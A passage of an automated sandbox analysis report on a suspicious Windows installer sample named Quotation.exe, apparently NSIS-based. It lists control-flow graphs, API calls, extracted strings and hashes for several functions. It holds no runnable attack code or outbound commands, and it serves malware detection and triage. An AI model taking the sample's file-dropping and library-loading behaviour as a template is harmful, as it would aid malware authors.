                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-3161716186
                                                              • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                              • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                              • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                              • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
                                                              Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 398->400 401 40312e 398->401 410 40325f-403267 call 40301e 400->410 411 40313f-403146 400->411 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 434 403224-40322a 405->434 406->403 432 403269-40327a 406->432 410->403 412 4031c2-4031c6 411->412 413 403148-40315c call 405fcc 411->413 420 4031d0-4031d6 412->420 421 4031c8-4031cf call 40301e 412->421 413->420 430 40315e-403165 413->430 423 4031e5-4031ed 420->423 424 4031d8-4031e2 call 406a02 420->424 421->420 423->398 431 4031f3 423->431 424->423 430->420 436 403167-40316e 430->436 431->396 437 403282-403287 432->437 438 40327c 432->438 434->403 434->406 436->420 439 403170-403177 436->439 440 403288-40328e 437->440 438->437 439->420 441 403179-403180 439->441 440->440 442 403290-4032ab SetFilePointer call 405fcc 440->442 441->420 443 403182-4031a2 441->443 446 4032b0 442->446 443->403 445 4031a8-4031ac 443->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->420 449 4031be-4031c0 447->449 448->431 448->447 449->420
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403093
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004030AF
                                                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004030FB
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-3241941453
                                                              • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                              • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                              • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                              • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                                                              Function 0040655E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 450 40655e-406567 451 406569-406578 450->451 452 40657a-406594 450->452 451->452 453 4067a4-4067aa 452->453 454 40659a-4065a6 452->454 455 4067b0-4067bd 453->455 456 4065b8-4065c5 453->456 454->453 457 4065ac-4065b3 454->457 459 4067c9-4067cc 455->459 460 4067bf-4067c4 call 406521 455->460 456->455 458 4065cb-4065d4 456->458 457->453 461 406791 458->461 462 4065da-40661d 458->462 460->459 464 406793-40679d 461->464 465 40679f-4067a2 461->465 466 406623-40662f 462->466 467 406735-406739 462->467 464->453 465->453 468 406631 466->468 469 406639-40663b 466->469 470 40673b-406742 467->470 471 40676d-406771 467->471 468->469 474 406675-406678 469->474 475 40663d-40665b call 4063ef 469->475 472 406752-40675e call 406521 470->472 473 406744-406750 call 406468 470->473 476 406781-40678f lstrlenW 471->476 477 406773-40677c call 40655e 471->477 486 406763-406769 472->486 473->486 481 40667a-406686 GetSystemDirectoryW 474->481 482 40668b-40668e 474->482 485 406660-406663 475->485 476->453 477->476 487 406718-40671b 481->487 488 4066a0-4066a4 482->488 489 406690-40669c GetWindowsDirectoryW 482->489 491 406669-406670 call 40655e 485->491 492 40671d-406720 485->492 486->476 493 40676b 486->493 487->492 494 40672d-406733 call 4067cf 487->494 488->487 490 4066a6-4066c4 488->490 489->488 496 4066c6-4066cc 490->496 497 4066d8-4066f0 call 406915 490->497 491->487 492->494 499 406722-406728 lstrcatW 492->499 493->494 494->476 503 4066d4-4066d6 496->503 507 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 497->507 508 406707-406710 497->508 499->494 503->497 505 406712-406716 503->505 505->487 507->505 507->508 508->490 508->505
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4024019347-2122288266
                                                              • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                              • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                              • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                              • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
                                                              Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 573 401774-401799 call 402dab call 405e67 578 4017a3-4017b5 call 406521 call 405df0 lstrcatW 573->578 579 40179b-4017a1 call 406521 573->579 584 4017ba-4017bb call 4067cf 578->584 579->584 588 4017c0-4017c4 584->588 589 4017c6-4017d0 call 40687e 588->589 590 4017f7-4017fa 588->590 598 4017e2-4017f4 589->598 599 4017d2-4017e0 CompareFileTime 589->599 591 401802-40181e call 406011 590->591 592 4017fc-4017fd call 405fec 590->592 600 401820-401823 591->600 601 401892-4018bb call 4055a6 call 4032b9 591->601 592->591 598->590 599->598 602 401874-40187e call 4055a6 600->602 603 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 600->603 615 4018c3-4018cf SetFileTime 601->615 616 4018bd-4018c1 601->616 613 401887-40188d 602->613 603->588 635 401869-40186a 603->635 618 402c38 613->618 617 4018d5-4018e0 CloseHandle 615->617 616->615 616->617 620 4018e6-4018e9 617->620 621 402c2f-402c32 617->621 622 402c3a-402c3e 618->622 624 4018eb-4018fc call 40655e lstrcatW 620->624 625 4018fe-401901 call 40655e 620->625 621->618 632 401906-40239d 624->632 625->632 636 4023a2-4023a7 632->636 637 40239d call 405b81 632->637 635->613 638 40186c-40186d 635->638 636->622 637->636 638->602
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,?,00000031), ref: 004017B5
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,?,00000031), ref: 004017DA
                                                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call
                                                              • API String ID: 1941528284-1453440118
                                                              • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                              • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                              • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                              • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                                                              Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 639 4055a6-4055bb 640 4055c1-4055d2 639->640 641 405672-405676 639->641 642 4055d4-4055d8 call 40655e 640->642 643 4055dd-4055e9 lstrlenW 640->643 642->643 645 405606-40560a 643->645 646 4055eb-4055fb lstrlenW 643->646 648 405619-40561d 645->648 649 40560c-405613 SetWindowTextW 645->649 646->641 647 4055fd-405601 lstrcatW 646->647 647->645 650 405663-405665 648->650 651 40561f-405661 SendMessageW * 3 648->651 649->648 650->641 652 405667-40566a 650->652 651->650 652->641
                                                              APIs
                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                              • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll
                                                              • API String ID: 2531174081-2743594400
                                                              • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                              • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                              • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                              • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68
                                                              Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 653 4026f1-40270a call 402d89 656 402710-402717 653->656 657 402c2f-402c32 653->657 658 402719 656->658 659 40271c-40271f 656->659 660 402c38-402c3e 657->660 658->659 661 402883-40288b 659->661 662 402725-402734 call 406481 659->662 661->657 662->661 666 40273a 662->666 667 402740-402744 666->667 668 4027d9-4027dc 667->668 669 40274a-402765 ReadFile 667->669 670 4027f4-402804 call 406094 668->670 671 4027de-4027e1 668->671 669->661 672 40276b-402770 669->672 670->661 682 402806 670->682 671->670 673 4027e3-4027ee call 4060f2 671->673 672->661 675 402776-402784 672->675 673->661 673->670 678 40278a-40279c MultiByteToWideChar 675->678 679 40283f-40284b call 406468 675->679 678->682 683 40279e-4027a1 678->683 679->660 686 402809-40280c 682->686 684 4027a3-4027ae 683->684 684->686 687 4027b0-4027d5 SetFilePointer MultiByteToWideChar 684->687 686->679 688 40280e-402813 686->688 687->684 689 4027d7 687->689 690 402850-402854 688->690 691 402815-40281a 688->691 689->682 692 402871-40287d SetFilePointer 690->692 693 402856-40285a 690->693 691->690 694 40281c-40282f 691->694 692->661 696 402862-40286f 693->696 697 40285c-402860 693->697 694->661 695 402831-402837 694->695 695->667 698 40283d 695->698 696->661 697->692 697->696 698->661
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                              • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                              • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                              • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                              Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 699 4032b9-4032d0 700 4032d2 699->700 701 4032d9-4032e1 699->701 700->701 702 4032e3 701->702 703 4032e8-4032ed 701->703 702->703 704 4032fd-40330a call 40349e 703->704 705 4032ef-4032f8 call 4034b4 703->705 709 403310-403314 704->709 710 403455 704->710 705->704 711 40331a-40333a GetTickCount call 406a70 709->711 712 40343e-403440 709->712 713 403457-403458 710->713 725 403494 711->725 727 403340-403348 711->727 715 403442-403445 712->715 716 403489-40348d 712->716 714 403497-40349b 713->714 718 403447 715->718 719 40344a-403453 call 40349e 715->719 720 40345a-403460 716->720 721 40348f 716->721 718->719 719->710 733 403491 719->733 723 403462 720->723 724 403465-403473 call 40349e 720->724 721->725 723->724 724->710 736 403475-403481 call 4060c3 724->736 725->714 730 40334a 727->730 731 40334d-40335b call 40349e 727->731 730->731 731->710 737 403361-40336a 731->737 733->725 742 403483-403486 736->742 743 40343a-40343c 736->743 739 403370-40338d call 406a90 737->739 745 403393-4033aa GetTickCount 739->745 746 403436-403438 739->746 742->716 743->713 747 4033f5-4033f7 745->747 748 4033ac-4033b4 745->748 746->713 751 4033f9-4033fd 747->751 752 40342a-40342e 747->752 749 4033b6-4033ba 748->749 750 4033bc-4033ed MulDiv wsprintfW call 4055a6 748->750 749->747 749->750 758 4033f2 750->758 755 403412-403418 751->755 756 4033ff-403404 call 4060c3 751->756 752->727 753 403434 752->753 753->725 757 40341e-403422 755->757 761 403409-40340b 756->761 757->739 760 403428 757->760 758->747 760->725 761->743 762 40340d-403410 761->762 762->757
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 551687249-2449383134
                                                              • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                              • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                              • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                              • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9
                                                              Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 763 4068a5-4068c5 GetSystemDirectoryW 764 4068c7 763->764 765 4068c9-4068cb 763->765 764->765 766 4068dc-4068de 765->766 767 4068cd-4068d6 765->767 769 4068df-406912 wsprintfW LoadLibraryExW 766->769 767->766 768 4068d8-4068da 767->768 768->769
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                              • wsprintfW.USER32 ref: 004068F7
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
